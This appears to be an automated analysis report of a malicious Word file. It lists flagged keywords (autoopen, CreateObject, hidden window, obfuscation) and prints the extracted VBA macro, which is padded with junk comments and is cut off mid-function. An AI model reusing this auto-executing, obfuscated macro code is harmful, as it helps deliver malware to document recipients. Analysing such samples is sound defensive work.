c0b26006b90c \xc0\xb2`\x06\xb9\x0c
59064942 Y\x06IB
b652505bb06b \xb6RP[\xb0k
90bb0080c5 \x90\xbb\x00\x80\xc5
b03b05509600 \xb0;\x05P\x96\x00
8b65110b02 \x8be\x11\x0b\x02
c709c16237 \xc7 \xc1b7
b90bb222 \xb9\x0b\xb2"
b32907207003 \xb3)\x07 p\x03
05887c70b3 \x05\x88|p\xb3
b209343430 \xb2 440
cb03300b586c \xcb\x030\x0bXl
c0921808 \xc0\x92\x18\x08
908070b90261 \x90\x80p\xb9\x02a
c037249356 \xc07$\x93V
9070208c88 \x90p \x8c\x88
c0b000b3 \xc0\xb0\x00\xb3
c290670177 \xc2\x90g\x01w
b802062067 \xb8\x02\x06 g
ccb3000104 \xcc\xb3\x00\x01\x04
90573020 \x90W0
0757001cbb \x07W\x00\x1c\xbb
b090289138 \xb0\x90(\x918
30b200050b08 0\xb2\x00\x05\x0b\x08
06705510 \x06pU\x10
506070c0 P`p\xc0
b0b0070175 \xb0\xb0\x07\x01u
004870b2 \x00Hp\xb2
b010053063 \xb0\x10\x050c
b35073290737 \xb3Ps)\x077
bb8b345009 \xbb\x8b4P
24064525 $\x06E%
b530230b0596 \xb50#\x0b\x05\x96
1b070208 \x1b\x07\x02\x08
1770032084 \x17p\x03 \x84
bb77b00329 \xbbw\xb0\x03)
006c408000 \x00l@\x80\x00
b0240c50b776 \xb0$\x0cP\xb7v
00306c5b03 \x000l[\x03
c50c07292672 \xc5\x0c\x07)&r
b49013030b28 \xb4\x90\x13\x03\x0b(
c2504bc92047 \xc2PK\xc9 G
bb1549c3 \xbb\x15I\xc3
c004604b \xc0\x04`K
389c242768 8\x9c$'h
b06000931b \xb0`\x00\x93\x1b
60c030000760 `\xc00\x00\x07`
b210c90c8109 \xb2\x10\xc9\x0c\x81
b60629930c \xb6\x06)\x93\x0c
c03bc00001 \xc0;\xc0\x00\x01
0070304b63 \x00p0Kc
c30861c90960 \xc3\x08a\xc9 `
c206b35306 \xc2\x06\xb3S\x06
89806039 \x89\x80`9
b2b9470b00 \xb2\xb9G\x0b\x00
105c14013088 \x10\\x14\x010\x88
2037300028 70\x00(
c9663800 \xc9f8\x00
b22442c426 \xb2$B\xc4&
10b10b395010 \x10\xb1\x0b9P\x10
80b970c4b9 \x80\xb9p\xc4\xb9
b4501348 \xb4P\x13H
c9cc0c1400 \xc9\xcc\x0c\x14\x00
c8002bc958 \xc8\x00+\xc9X
490062076b07 I\x00b\x07k\x07
b8040c22 \xb8\x04\x0c"
c03c10309002 \xc0<\x100\x90\x02
bb0c4601 \xbb\x0cF\x01
c192c10909 \xc1\x92\xc1
89000000 \x89\x00\x00\x00
b93c082b \xb9<\x08+
c30568c098 \xc3\x05h\xc0\x98
c40c7b1c78cc \xc4\x0c{\x1cx\xcc
c75003301509 \xc7P\x030\x15
8831b012 \x881\xb0\x12
09401130 @\x110
5905090290 Y\x05 \x02\x90
b4020402c1 \xb4\x02\x04\x02\xc1
507406002c Pt\x06\x00,
c06088160c15 \xc0`\x88\x16\x0c\x15
cbc1c8607062 \xcb\xc1\xc8`pb
061c763809 \x06\x1cv8
b69b0107 \xb6\x9b\x01\x07
630b000970 c\x0b\x00 p
b2608c2007b6 \xb2`\x8c \x07\xb6
8918b544 \x89\x18\xb5D
b9997404c7 \xb9\x99t\x04\xc7
208689902740 \x86\x89\x90'@
bc7850849c97 \xbcxP\x84\x9c\x97
c017004200 \xc0\x17\x00B\x00
3901610700 9\x01a\x07\x00
c3c0508288 \xc3\xc0P\x82\x88
b40580603123 \xb4\x05\x80`1#
71097408 q t\x08
46b0489598 F\xb0H\x95\x98
92024508c0 \x92\x02E\x08\xc0
b4308c61738b \xb40\x8cas\x8b
b0b3030103cc \xb0\xb3\x03\x01\x03\xcc
b077225032 \xb0w"P2
c07000c088 \xc0p\x00\xc0\x88
64557691b0 dUv\x91\xb0
bc1bbc00700b \xbc\x1b\xbc\x00p\x0b
b054b7bb75 \xb0T\xb7\xbbu
80867b29 \x80\x86{)
b4049083 \xb4\x04\x90\x83
8c8cb816 \x8c\x8c\xb8\x16
0032173206 \x002\x172\x06
09b1805cc8 \xb1\x80\\xc8
c98026840305 \xc9\x80&\x84\x03\x05
cb3b71352441 \xcb;q5$A
b400073b \xb4\x00\x07;
bc9517b0751b \xbc\x95\x17\xb0u\x1b
0c950c83 \x0c\x95\x0c\x83
c56960290407 \xc5i`)\x04\x07
701005016044 p\x10\x05\x01`D
bb550930 \xbbU 0
c0c6279305 \xc0\xc6'\x93\x05
ccc900170c08 \xcc\xc9\x00\x17\x0c\x08
c0560630c6 \xc0V\x060\xc6
c0668000980b \xc0f\x80\x00\x98\x0b
b504c029c2 \xb5\x04\xc0)\xc2
15850b83 \x15\x85\x0b\x83
29505b38 )P[8
3215269524 2\x15&\x95$
cc05161550 \xcc\x05\x16\x15P
c5979730000b \xc5\x97\x970\x00\x0b
c0040557 \xc0\x04\x05W
5b00597284 [\x00Yr\x84
96698654 \x96i\x86T
b05580509c \xb0U\x80P\x9c
c93b1307 \xc9;\x13\x07
b07b51660010 \xb0{Qf\x00\x10
b051000b2442 \xb0Q\x00\x0b$B
340b9200 4\x0b\x92\x00
b9b3c04670 \xb9\xb3\xc0Fp
9177020130 \x91w\x02\x010
b113008972 \xb1\x13\x00\x89r
c70722093692 \xc7\x07" 6\x92
3259902360 2Y\x90#`
bc0651643077 \xbc\x06Qd0w
61b317109c a\xb3\x17\x10\x9c
b90158606801 \xb9\x01X`h\x01
bc09930172 \xbc \x93\x01r
c30629206580 \xc3\x06) e\x80
b067573294b1 \xb0gW2\x94\xb1
b3221cb649 \xb3"\x1c\xb6I
00834b82 \x00\x83K\x82
bbcc00b48753 \xbb\xcc\x00\xb4\x87S
cb704b1330 \xcbpK\x130
75b08104 u\xb0\x81\x04
0156444570 \x01VDEp
20975641 \x97VA
b090050000 \xb0\x90\x05\x00\x00
393657c02388 96W\xc0#\x88
b270730603 \xb2ps\x06\x03
bbc0470304 \xbb\xc0G\x03\x04
90790463b0 \x90y\x04c\xb0
12370b51 \x127\x0bQ
c80901129173 \xc8 \x01\x12\x91s
4501070487 E\x01\x07\x04\x87
cb50b092b53c \xcbP\xb0\x92\xb5<
c298790540 \xc2\x98y\x05@
c6400580 \xc6@\x05\x80
0657cbc7 \x06W\xcb\xc7
c0098500 \xc0 \x85\x00
07176034 \x07\x17`4
0c993b7c65 \x0c\x99;|e
Suspicious
ChrW May attempt to obfuscate specific strings (use option --deobf to deobfuscate)
virtual May detect virtualization
CreateObject May create an OLE object
system May run an executable file or a system command on a Mac (if combined with libc.dylib)
ShowWindow May hide the application
ChrW May attempt to obfuscate specific strings (use option --deobf to deobfuscate)
Open May open a file
virtual May detect virtualization
CreateObject May create an OLE object
system May run an executable file or a system command on a Mac (if combined with libc.dylib)
AutoExec
autoopen Runs when the Word document is opened

Extracted Macros

VBA Filename x2790534112.bas Extracted Macro
Function x90933c0328()
On Error Resume Next
   'Tenge Incredible Meadows Crest Avon Integration Team-oriented Games, Health & Grocery Sleek incremental
cb50x091c490 = True
'quantify cultivate Savings Account USB digital cross-platform Chief models Practical Plastic Chips programming
cc09047856348 = "Baby & Shoes Ranch quantifying quantifying View policy Awesome Frozen Chips Money Market Account Small Cotton Hat Soft"
'application needs-based demand-driven invoice Summit static Cape Verde Escudo
      x014xx29x5x = c90x42320906 - x3870730713x
      'Corporate strategic Metrics Rapid Home Loan Account Green
      Select Case xbx07405243
      'deliver capacitor Rustic payment Brand orchestrate leverage high-level Intelligent Plastic Keyboard
         Case c523005144010
         'grid-enabled synergies Falkland Islands Pound Delaware Small Wooden Chicken User-friendly Direct Rubber
            x9847b20800 = bx12b073304x1
            'bandwidth red stable override input Canadian Dollar Iraq firmware Games, Clothing & Computers
            cc99294690b8 = Atn(b303973c7b059)
            'generating Macao XSS circuit Garden Incredible Granite Shoes azure Digitized
         Case x33b9b6213015
         'Indiana Lebanon index Clothing & Tools Chief Strategist portals
            xc190568651 = b90x79579797
            'Global Malagasy Ariary e-enable Garden Mauritania mobile Research schemas hard drive Shoal transparent Sleek Plastic Bike clicks-and-mortar
            cx93072b02x = c90757085608
            'French Polynesia Unbranded Wooden Towels deposit transmitter deposit Decentralized
         Case c275b93080c
         'system-worthy sky blue compress Brazil Inverse Web Ohio Checking Account
            b606x72900010 = ChrW(x609b6601002)
            'Clothing, Home & Sports maroon SAS brand Ergonomic Frozen Salad Open-source salmon orange redundant Sleek optimize
            xb5b97c7x0x53 = b1c707bx5230
            'matrix Alabama Planner transmitter Designer Tactics Sleek parallelism schemas vertical instruction set bandwidth embrace
      End Select
      'Ridges white Auto Loan Account infrastructures invoice executive Borders transform International Trace
      cb220006c262 = Atn(c871848709b3)
      'Buckinghamshire Executive Games integrated Expanded Port hacking Shoes & Automotive
      x0394030016 = Hex(xb0x708c08cc)
'Unbranded Frozen Bacon Locks Incredible Soft Chicken plum Awesome Granite Tuna monitor Intelligent world-class Incredible e-commerce calculating Investment Account web-enabled
   'Handmade Cotton Chips Thailand North Carolina Representative reintermediate Plaza
b6x43c7x29b0 = False
'Triple-buffered Intelligent Cotton Gloves Nebraska Meadows multi-byte schemas Money Market Account
cc09047856348 = "Rupiah synergistic Glen Awesome Fresh Practical Concrete Shirt Graphical User Interface transmit experiences Light"
'Associate Communications Unbranded Wooden Sausages Buckinghamshire Electronics & Books strategy Tasty Soft Soap Awesome Steel circuit maroon quantifying bandwidth port
      b7c00x66x420 = x01bcb4563030 - c07904cc09bc0
      'B2C program Wooden initiatives synergize architectures black
      Select Case x430025000x0
      'Unbranded Investment Account Frozen best-of-breed Internal website monitor Refined virtual
         Case x7b70c491x200
         'Chief deposit Incredible quantifying azure lime
            x05x0160x044 = c94c20b06b213
            'payment Representative throughput Toys, Jewelery & Automotive Markets Operations Cotton deposit Belgium Handcrafted Polarised Licensed
            bb5b69070b75 = Atn(b4940320966)
            'modular Buckinghamshire Extensions mint green Ways redundant Refined Cotton Bacon Small Metal Tuna Licensed Metal Bike Tennessee payment Club copy
         Case b3990384003
         'purple array Small Granite Fish Reverse-engineered Marketing Field Assurance port Croatia RSS
            cc4x8450087 = cb9307185213
            'Investment Account Functionality Pre-emptive Maldives Mews Object-based Adaptive Small panel Vietnam technologies
            c8064003b58 = cc68c055696
            'EXE Money Market Account JBOD Product Neck deliverables El Salvador schemas optical
         Case x350190252ccc
         'Progressive Practical Frozen Computer Representative Rapids Maine East Caribbean Dollar Intelligent Rubber Shirt Personal Loan Account hard drive Money Market Account International Sleek Cambridgeshire
            b018x62607b4 = ChrW(b02588701200)
            'Personal Loan Account open-source monitor Mandatory Home Loan Account collaborative enhance override
            c350bx066001 = b2c2880308510
            'XML Cedi deposit cyan Metal Unbranded Granite Bike Analyst Shoals
      End Select
      'Generic Steel Chair orange Liaison bypass South Carolina grey Paraguay multi-byte override
      c9b8087cb3180 = Atn(b58030c82c55)
      'orchid system Arkansas withdrawal Regional Tennessee Nepal purple
      b0c308b06c10c = Hex(b0b05cx6b209x)
'fuchsia Graphic Interface installation Compatible harness Buckinghamshire generate niches compress Michigan Customer Courts Home Loan Account
Set x90933c0328 = CreateObject(b491104015b07(b0x770330081 + x7201320x00.b083b090040 + cc54300xx03c))
   'Grass-roots Oklahoma leading edge grey Cambridgeshire explicit Dynamic expedite Intelligent Alabama Associate Liaison
x8x8040x265 = True
'Gorgeous Handmade Concrete Soap aggregate synthesize tangible North Carolina Unbranded Granite Chips magnetic Cotton structure Gorgeous Granite Ball New York
cc09047856348 = "Savings Account synergize Personal Loan Account Jordan Refined Rubber Car Savings Account supply-chains Practical Generic Granite Chips hard drive Industrial, Games & Clothing Liaison Metal"
'Steel Sleek Small Steel Table Health, Sports & Movies bypass Borders green Unbranded
      x0xc3x5002796 = c9832b77520 - c46027x002x77
      'Metal Stream cultivate Shoes ivory Landing Costa Rica holistic Group Intelligent Granite Keyboard needs-based Representative International Licensed Steel Chair
      Select Case b502c6360bx9
      'driver expedite Syrian Pound Ergonomic Plastic payment e-commerce systematic
         Case b0509069840
         'Rubber Pre-emptive Kids, Beauty & Games Cotton Executive Home Loan Account bandwidth infomediaries
            c5808011x27 = b0802028447
            'Buckinghamshire Cedi Incredible Steel Car Multi-layered Iowa open-source Awesome Rubber Hat Well Outdoors & Health Kentucky Tasty Buckinghamshire
            x08062018b224 = Atn(x770x629b9cb)
            '6th generation Representative back up e-tailers Gorgeous Tools & Books Auto Loan Account Incredible
         Case bbxc0046103x
         'Small Steel Pizza violet deposit Integration bus 5th generation Oval tan Graphic Interface
            c480b96009830 = x3107201b8xc
            'Lead Gorgeous Granite Mouse Coordinator Refined Fresh Fish optimizing Central withdrawal
            c607308b2x2b = x65020c4cc3
            'connecting national Concrete Ford Movies, Jewelery & Sports Awesome withdrawal Unbranded Soft Shirt Home & Movies Fantastic Beauty & Games Fresh
         Case x62x705x1896c
         'calculate hack Total Quality De-engineered Specialist
            xc760907cc081 = ChrW(c18156x09cb1)
            'Adaptive microchip Harbor COM TCP bypassing Orchestrator Toys, Baby & Beauty programming
            c2cxc30600b20 = c3280060054b1
            'Senior Springs Hawaii Unbranded Wooden Keyboard indexing Assistant Generic mobile black Alaska transmit deposit
      End Select
      'Tunnel Ergonomic Rubber Tuna Fantastic Plastic Sausages groupware Ergonomic Metal Tuna program Orchestrator
      c5095097xx41 = Atn(xc70b000710c4)
      'Consultant Corporate calculate knowledge base e-enable moderator Fantastic Money Market Account parse Extension matrix Burundi
      c208518417x0 = Hex(b47cc020bb0)
'best-of-breed Security Washington tertiary primary indigo Strategist
   'plug-and-play distributed Baby & Baby moratorium Berkshire PNG responsive framework reciprocal copying Djibouti Franc
c06000c022x6 = True
'Kids & Tools backing up Refined Plastic Bacon payment calculating Corner Buckinghamshire Plastic Checking Account Sleek Rubber Chair transmit
cc09047856348 = "Christmas Island Tasty Concrete Keyboard Parkways open-source open-source Borders Small Wooden Tuna Infrastructure"
'digital attitude Intuitive Valleys orchestrate transmit forecast
      x45678742b800 = cx00c2x310b8 - x3b0113x6c9
      'leading-edge payment infomediaries Small Plastic Bike Internal mobile Lead
      Select Case b5200c472b6
      'rich Intelligent Steel Pants HTTP transmit North Carolina orchid Cambridgeshire Liaison
         Case xx285x4c097b
         'application vortals black users SDD grey Home Loan Account Jewelery & Jewelery bandwidth website Polarised
            x8502305000b6 = x2798c390994c
            'Investor Granite wireless circuit THX Bolivar Fuerte Trail neural compress Squares navigating silver invoice
            c02310022068c = Atn(b5850503x8006)
            'calculating system-worthy copying synthesizing New Jersey Unbranded Frozen Mouse granular Cambridgeshire GB reboot Home, Movies & Beauty users
         Case c00bcx0c60c0
         'Indonesia Fresh Facilitator Generic Steel Bacon utilize virtual orchid compressing heuristic Thailand Configurable Austria Dynamic knowledge user
            x5c3131989306 = b0310090b1763
            'transmit synergies Intelligent Steel Computer Coordinator monitoring Bedfordshire Brazil Orchestrator virtual
            c5840c972021 = c4675c0007b
            'Spring zero administration motivating red plug-and-play Identity bleeding-edge Kids & Jewelery 24 hour Auto Loan Account
         Case xb8007x00bb36
         'success Fresh web-readiness Junctions Gorgeous TCP Small Israel interface Supervisor back up experiences value-added
            x5586930b000 = ChrW(cb255858037cc)
            'Unbranded Granite Mouse wireless Saudi Riyal Junctions navigating Customizable experiences quantifying Greenland utilize Intelligent Refined Steel Soap Health
            b107503b500 = b0x8cx1x00x
            'sky blue e-enable invoice Principal Incredible Cotton Towels Rubber e-business generating
      End Select
      'overriding index Technician Fresh intuitive Square Handcrafted azure invoice compressing bypass Quality Burg Applications
      b5cx364799044 = Atn(c06601bc30xc)
      'Communications Sudanese Pound Small Concrete Car application Oregon transmit Pennsylvania Eritrea Re-contextualized sticky Division distributed
      b3076300474 = Hex(cbx2000x03608)
'1080p Balanced Representative Qatari Rial International Shoal Checking Account Avon cyan scalable Vietnam
x90933c0328.ShowWindow = wdTextureNone
   'Bedfordshire Intelligent Soft Bike Soft withdrawal incubate maroon
x90c90c00112x = True
'wireless quantify Ergonomic Fresh Pizza product Savings Account Diverse Music Cloned compressing Refined Fresh Keyboard Borders Ergonomic Concrete Pants Refined Steel Pants
cc09047856348 = "Brazil protocol markets invoice relationships deposit International Crest"
'Granite enable transmit Division New Hampshire application Cotton Groves
      x2c504407xx20 = c5000200c15 - c2x402b1b60
      'Fresh United Arab Emirates leverage Lilangeni Savings Account Bedfordshire Kiribati Lock Avon Organized Cambridgeshire Road
      Select Case c2b882b7395x6
      'orange Cambridgeshire visionary back up Director HTTP olive parse multi-byte Nauru
         Case b02222b3075
         'open-source Security Response architecture Tasty Fresh Mouse projection
            x00x60680561x = b642600b26c7
            'bypass invoice models grow challenge Neck Sharable emulation program web services syndicate
            xbc8365056616 = Atn(cb205051cb01)
            '24/365 SDD Rest parsing Norway index Dynamic throughput gold Synchronised integrated
         Case b3400843680c9
         'Iraq Sleek Soft Salad Upgradable virtual communities port
            c33186400cb80 = b39c01c300x3
            'Director Metal Money Market Account invoice program Investor Assistant Norwegian Krone firewall
            c3b43406xbbb = c806301757c8
            'Awesome Fresh Shoes Ergonomic Fresh Chips quantify ADP Technician Solutions Facilitator Rufiyaa
         Case b17102x0x26
         'Advanced Rubber deposit Delaware AI Diverse Auto Loan Account Rustic convergence access calculate
            c37x0077c0608 = ChrW(c51909x0602)
            'Common Incredible Fresh Ball Zambian Kwacha transmitting Corporate budgetary management Bedfordshire optical Pennsylvania Fantastic open-source
            c7900x220730 = b2x1c00x6x00
            'bypassing South Dakota Loop North Dakota quantify Brook Greece empower Cambridgeshire Maryland
      End Select
      'help-desk West Virginia deposit Tenge Avon Field
      bbb670062718c = Atn(c00037659b3)
      'navigate Buckinghamshire Tala seize customer loyalty deliverables Kip connect Bedfordshire cohesive parsing synergize New Mexico
      x8c00490501x7 = Hex(b068007c0x0)
'Granite bypass ivory Manager bottom-line quantifying Place Avon Small Licensed Concrete Mouse one-to-one Manager
   'navigate engineer Associate Ergonomic Soft Salad Savings Account Handcrafted Soft Shoes plum Auto Loan Account payment Serbian Dinar FTP
b08c6b85656 = True
'drive plug-and-play Awesome Wooden Chips Orchestrator indexing Licensed Granite Shoes HDD Virginia Books & Shoes Kids, Music & Toys Handcrafted
cc09047856348 = "capacitor payment scale wireless Small Steel Chicken Handcrafted Soft Table copying Licensed Steel Computer Tactics Producer"
'Via View Outdoors & Automotive Granite Avon Handmade Unbranded Cambridgeshire International bypassing
      x0621x802940 = b9b9x098364c - c2c3700c4571
      'didactic input e-tailers Pike Director calculate Refined Plastic Keyboard Handcrafted Soft Bike Hawaii Data global microchip
      Select Case xc1127b05956
      'deposit ROI Central deposit white Garden & Beauty
         Case b00b61b06b33
         'Cape Verde hierarchy Fall Money Market Account open-source Communications Causeway time-frame Cambridgeshire Keys
            x7c053513100 = c40x1194769
            'Accountability Optimization feed Configurable Data deposit Lead Trinidad and Tobago Dollar
            x7c00095079 = Atn(x189c80xcc13)
            'Buckinghamshire connecting Kansas capability granular Investor SSL back up
         Case b0x8x1x17c30
         'Representative Port Self-enabling circuit Analyst implement Route Kwacha syndicate Prairie Steel quantifying
            b00c00x5003b = x50606b7008
            'Spur Practical Soft Soap Re-contextualized Generic Concrete Chips Canyon Rest Tasty Azerbaijan Product New Jersey Money Market Account
            c863c91612b = bcbc2000cb1
            'Horizontal bypass Chief Frozen Practical Rubber Gloves Fantastic multi-tasking Strategist Reunion
         Case b70c05c7c02
         'Plastic Legacy Florida Rhode Island card Organized online transition Usability Guinea Franc
            b1901017c05 = ChrW(cx59726x386x)
            'connecting Liaison Licensed Fresh Mouse open-source distributed Unbranded
            x71307b87b30 = bc85520bc410
            'azure Wells Rwanda harness ivory Balanced New Caledonia Coordinator Lek composite HDD
      End Select
      'impactful Baht function Architect Orchestrator Cambridgeshire holistic
      x6c00200077 = Atn(x5349x05cxb7)
      'Vista web services Global conglomeration Lead context-sensitive maroon
      x50b0707b05x0 = Hex(xx030980060b)
'Kansas user-centric Kids & Baby pricing structure methodologies innovate multi-byte New Mexico target Mobility Glens framework scalable SMS
End Function
Function b491104015b07(x08000685306)
On Error Resume Next
   'Avon salmon Branding middleware SMTP SAS payment Washington Awesome Cotton Gloves Radial calculating Station driver Port
b300038x4b0 = False
'human-resource quantify empowering neural back-end user-facing monitor Savings Account Unbranded Soft Pants
cc09047856348 = "ivory Metical Stand-alone Multi-tiered Wooden Response Gorgeous Cotton Shirt Ergonomic Cotton Mouse Cotton copy Automotive & Music Incredible transmitter"
'context-sensitive Mission digital magnetic Incredible payment silver RSS one-to-one Frozen Borders Switchable Administrator
      c084042440xc = b0c94b030908 - bb90995bx0456
      'Oregon RAM networks enable Jewelery, Outdoors & Kids calculating
      Select Case b00b9b11457
      'Executive synthesize Ergonomic Generic Granite Cheese CSS copy matrix Mountain systems Home Loan Account Factors
         Case c05bx3021b5b
         'compressing Tasty Steel Chicken Borders contextually-based Isle of Man Crescent FTP Bhutan portals New Caledonia Auto Loan Account stable
            c3206cb70c77 = c36cb0cc324
            'Future-proofed teal Cotton Refined Fresh Bacon Toys virtual Up-sized Seychelles interface Port
            cb02x7860c6x5 = Atn(x36468506201)
            'Rustic Canada Knolls olive Re-contextualized Multi-channelled Cotton Ergonomic Steel Ball Money Market Account
         Case c0635c5b06xc
         'Incredible Granite Hat Circle orchestration Small Paradigm synthesize Steel Money Market Account Lights deposit
            xxb850b0008x5 = cx340010902
            'copy virtual Licensed Fresh Table protocol Dynamic Spring invoice Nebraska Granite
            b043069613045 = b8482006899
            'Hawaii reboot Comoro Franc time-frame Buckinghamshire deposit Trail Cambodia white Central wireless superstructure architectures
         Case x49c0c5072c05
         'Plastic systems protocol strategic Home Loan Account Michigan
            b7x50x5b678b9 = ChrW(bc69508742640)
            'payment Uganda Interactions scale Credit Card Account Open-source copy Credit Card Account Silver Human Cameroon throughput
            c0bx0b92007 = b3b0308x402
            'Tennessee Generic navigating web-enabled Spring Dale
      End Select
      'Agent Kenyan Shilling Niue Group Fresh ADP Rest Buckinghamshire payment Central Park
      c7c57692000 = Atn(b0069056xb19)
      'embrace 1080p Corporate Glen Lead Lebanese Pound invoice Sleek Plastic Pizza cyan
      b1300b0bbb6 = Hex(b095bb019b0)
'quantifying Technician Rustic Frozen Hat upward-trending bypassing interface Montenegro
   'Spring input Assistant Configuration matrix Toys, Electronics & Garden
c7100669297 = True
'Gorgeous Rubber Fish panel Awesome Soft Bike Lead Officer Shoals Face to face Turnpike Course Union
cc09047856348 = "Developer Frozen yellow value-added Generic neural Handcrafted Soft Table"
'Estate Movies & Sports Technician Concrete redundant Specialist parse
      cx7b60286813 = b070c7bx500x9 - b50400c5b730
      'quantifying driver Tools Personal Loan Account Agent portals quantify Missouri Granite partnerships Internal Handmade Granite Bacon
      Select Case c0596c08052
      'Director parsing optical parsing United Arab Emirates index Secured mesh Unbranded Rubber Gloves
         Case b0b6b3bb1303b
         'expedite Universal transmitting cutting-edge Forward Kansas Massachusetts
            b40989606219 = c5c7x780x253c
            'solutions Steel Awesome Saudi Arabia Generic Soft Chicken Phased US Dollar open-source
            b4506c3868bx = Atn(x08336009x89)
            'Rustic Cotton Pants Frozen Frozen Cambridgeshire Handmade brand Internal partnerships Canyon backing up multi-byte Passage Rustic Rubber Cheese Awesome Frozen Gloves
         Case b1370c009017
         'Fantastic Frozen Car Intelligent Frozen Computer Sleek Metal Gloves discrete redundant plum Legacy infrastructures
            b006840400010 = b208xb326107
            'generate generate parse innovate connecting back up installation copying Future Metal Functionality
            cc91x19bbxb = b4974112640
            'AGP user-centric aggregate Nebraska Savings Account Lead Home Investment Account Producer
         Case x9320061x0b00
         'open-source salmon Vision-oriented intranet quantifying payment microchip Tasty Cote d'Ivoire Customer Rustic Plastic Salad
            b10750000844b = ChrW(c0020x90c2x)
            'Canada info-mediaries protocol systematic Tasty Rubber Soap Saudi Riyal Refined Handcrafted Metal Pizza Orchestrator
            b7779303730 = c685443003b
            'Refined Frozen Keyboard index Haiti Delaware morph Ergonomic Metal Bacon neural schemas Rue Montana
      End Select
      'solution-oriented Small Liechtenstein Berkshire Interactions Architect Nevada solution impactful Lodge Managed
      c74725x831b0 = Atn(c0c4b6921c907)
      'Checking Account white programming Drive violet global
      b26cc5300b39 = Hex(x78984000000)
'Chief interactive backing up East Caribbean Dollar strategic Intelligent data-warehouse Borders Port
c60xbxxb86403 = x08000685306
   'artificial intelligence static green compressing payment Consultant Pataca yellow withdrawal Taiwan Markets copy Sleek
x6x401450x00 = False
'Usability Intranet Unions firewall Wooden Small Soft Ball Home Loan Account enable Customer Oval Kids Steel
cc09047856348 = "River National Producer Brunei Dollar PCI Ergonomic Steel Car Fantastic Steel Chips Home Loan Account contextually-based implement"
'Investment Account Armenia functionalities parse success Fresh Streamlined Gorgeous Steel Keyboard microchip adapter connecting clear-thinking Manager Analyst
      c0b26006b90c = bx590649426 - c981058x828
      'navigate synergy Norwegian Krone Profound Yemeni Rial Cliffs digital National Intelligent Soft Gloves California Bedfordshire New Zealand Dollar Alaska
      Select Case b652505bb06b0
      'compress Infrastructure Music, Jewelery & Beauty benchmark Centers brand calculate
         Case x60079x056b
         'Down-sized payment Principal index invoice invoice Concrete Ergonomic cyan Bypass Books
            x000bx002b0 = x90bb0080c50
            'Rustic Fresh Pizza Intelligent client-server Credit Card Account Minnesota e-enable
            b9x04c502x9 = Atn(b1040x1720341)
            'Trace bottom-line Plastic ADP Markets Small Taiwan Albania pixel Intelligent Rubber Table Rustic Djibouti Franc deliverables Rustic Rubber Cheese
         Case b820x05b2347
         'US Dollar driver cyan USB Rubber violet back up Jamaican Dollar payment Representative
            b03b05509600 = c83c5x28000
            'client-driven ability bypass View Security schemas compressing virtual Granite optical system Tasty
            x8b65110b02 = c709c162370
            'Profound reintermediate Albania Practical Generic Granite Hat USB Compatible Village back up Intuitive Investment Account New Israeli Sheqel client-driven
         Case cb0x7cb4318
         'hacking Switchable Incredible hack transmitter Village Baby, Electronics & Jewelery online
            b1398x01x98x = ChrW(b90bb222cxb4b)
            'ROI Comoro Franc synthesize Sports, Books & Outdoors Marketing reboot Burgs systems relationships Executive expedite South Africa Gorgeous Soft Shirt
            b329072070030 = xx05887c70b3
            'invoice IB Direct Won green Personal Loan Account Refined compressing blue maximize back-end matrix
      End Select
      'Curve integrated static Analyst Generic Balanced tertiary Garden & Industrial Berkshire Senior
      b209343430c = Atn(xcb03300b586c)
      'Jewelery & Computers Personal Loan Account GB Mountains United States of America deliverables
      c0921808x87 = Hex(c8b2605x500)
'reboot Incredible Steel Computer indexing Auto Loan Account Movies Product SMTP Tools Fresh Supervisor green
   'Personal Loan Account Handcrafted Granite Gloves Bedfordshire Yen back-end projection Persistent Lead Fundamental JBOD USB XML
c60c5x140c61 = True
'Lead Personal Loan Account Marketing Steel Cambridgeshire matrix Public-key neural cyan Sleek Metal Bike Awesome Frozen Sausages optical Handcrafted Steel Gloves
cc09047856348 = "auxiliary content Auto Loan Account Ports Home conglomeration Data Montana Licensed Garden & Jewelery Silver"
'Small Director Synergized transmitting Ergonomic Concrete Ball reinvent Landing convergence Valleys copying
      x908070b90261 = c0372493560 - x9070208c88
      'Officer executive Unbranded Steel Chicken Bedfordshire Rufiyaa Saint Helena Harbor index Lodge Refined Rubber Ball Fresh front-end
      Select Case c0b000b3x1c89
      'Stand-alone integrated Licensed Steel Bacon Refined Soft Sausages cross-platform Personal Loan Account Stream payment Executive driver Islands Rustic Rubber Chair Devolved
         Case b3cxb00x0970
         'Mississippi Ports Factors Russian Federation alarm Total Mission invoice magenta withdrawal Profound
            c290670177x4 = b8020620677
            'Savings Account Incredible neural-net Personal Loan Account 6th generation payment action-items Metrics Orchestrator plug-and-play
            ccb30001049 = Atn(bc07x90573020)
            'Director IB Villages array Human plug-and-play Accountability compressing New York Auto Loan Account Licensed reinvent Virtual Incredible
         Case x0c376cx51b
         'SSL Argentine Peso Specialist Lari content-based PCI
            x511b1bbx060x = c2bx1011246
            'Response Coordinator monitor Tugrik Netherlands Antilles e-services Sports & Games Technician Investment Account ADP Buckinghamshire Incredible Frozen Tuna salmon Jewelery
            x2401x3bb7c = xx0757001cbb
            'system-worthy transmitting Architect Fiji South Dakota Self-enabling utilize Berkshire Kansas Point supply-chains South Carolina composite Spur
         Case c2006x00967
         'Automotive & Kids Awesome pixel Industrial Cloned orange Savings Account Forward heuristic
            xb090289138 = ChrW(x30b200050b08)
            'olive grid-enabled Iraqi Dinar copy Awesome Soft Chair program Synergized payment open-source
            x23x067055108 = c20684x7199b0
            'RSS Fully-configurable deliver Distributed Operations strategize Incredible Fresh Chicken deposit channels Specialist Mobility mint green
      End Select
      'plug-and-play Handmade Estate Strategist Route web services Rustic Wooden Towels convergence pink AI relationships
      c17070x8b5955 = Atn(x270000bx4b)
      'Object-based middleware leverage Libyan Arab Jamahiriya Concrete orange Concrete Implementation Drive bandwidth neutral Gorgeous Practical Fresh Table
      xx506070c09 = Hex(b0b00701755x5)
'Swaziland plug-and-play Malta Bhutan PCI Zimbabwe Dollar Universal programming Configuration Falls Alabama
c6x004870b2x6 = "50"
   'International withdrawal intangible paradigms Trail Australian Dollar Engineer AGP quantify US Dollar revolutionary
x78x5bx092c0 = False
'Buckinghamshire National overriding complexity Quality Global Web
cc09047856348 = "content-based zero administration invoice transmit circuit Intranet Movies, Outdoors & Beauty feed overriding Regional International Robust"
'cultivate Health core Designer paradigm Sleek Plastic Tuna Road ROI Awesome Wooden Car Rustic Fresh Computer harness navigating hierarchy Outdoors & Home
      b0100530637 = b35073290737 - xbb8b3450094
      'Home & Jewelery hard drive Station Florida New Jersey Buckinghamshire Berkshire Intelligent Concrete Pizza parsing Savings Account quantifying
      Select Case xx240645257
